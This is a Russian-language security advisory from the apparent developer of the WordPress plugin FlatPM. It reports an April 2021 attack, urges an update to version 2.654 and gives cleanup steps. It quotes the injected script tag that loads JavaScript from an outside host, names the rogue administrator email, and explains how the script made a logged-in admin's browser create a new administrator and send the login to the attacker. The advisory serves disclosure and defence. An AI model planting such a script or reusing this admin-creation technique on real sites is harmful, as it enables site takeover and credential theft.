Осторожно кибер-атака!

Осторожно кибер-атака!

Добрый день, дорогие коллеги!

Сегодня (13.04.21) произошла хакерская атака на сайты с установленным плагином FlatPM! Настоятельно просим обновить плагин до свежей версии!

Патч – v2.654
1. Закрыта дыра в коде, которая позволяла внедрять вредоносный код на ваш сайт.
2. Исправлена совместимость в WPRocket, с его функцией отложенных скриптов.

Итак! Если у вас на сайте был замечен код в разделе Header и footer:
<script type='text/javascript' src='https://wpctrl.tk/ds.js'></script>
Проверьте появился ли новый администратор с почтой: system@wordpress.local


Если это ваш случай, то я настоятельно рекомендую восстановить полный бекап сайта за вчерашний день (12.04.21) или ранее!
Если по какой-то причине вы этого не хотите делать или не можете, то удалите вредоносный код из раздела Header и footer, затем удалите нового пользователя из админки.
После этого обновите плагин до версии 2.654! Обязательно смените пароль! Почистите куки вашего браузера! Обязательно почистите кеш на вашем сайте, т.к. вредоносный скрипт может быть закеширован!

Попытаюсь объяснить как произошёл взлом:
Злоумышленник через admin-ajax.php воспользовался уязвимостью и внедрил код
<script type='text/javascript' src='https://wpctrl.tk/ds.js'></script>
в раздел header и footer. Затем вы или другой администратор сайта зашли на сайт залогиненым.
В браузере сработал вредоносный код, который отправил запрос к /wp-admin/user-new.php на создание нового юзера.

Если это сделает любой другой человек – ничего не произойдёт, но если это сделает администратор, то новый пользователь будет создан!

Затем скрипт отправил логин и пароль атакующему.

check

Прошу прощения за доставленные неудобства!

Плагин только недавно попал в репозиторий, что вызвало интерес разных хакеров к проекту.
Я не имею очень большой практики по кибербезопасности, поэтому допустил ошибку.

Но я всегда держу телеграмм рядом и стараюсь работать максимально оперативно.

Комментарии

Adblock
detector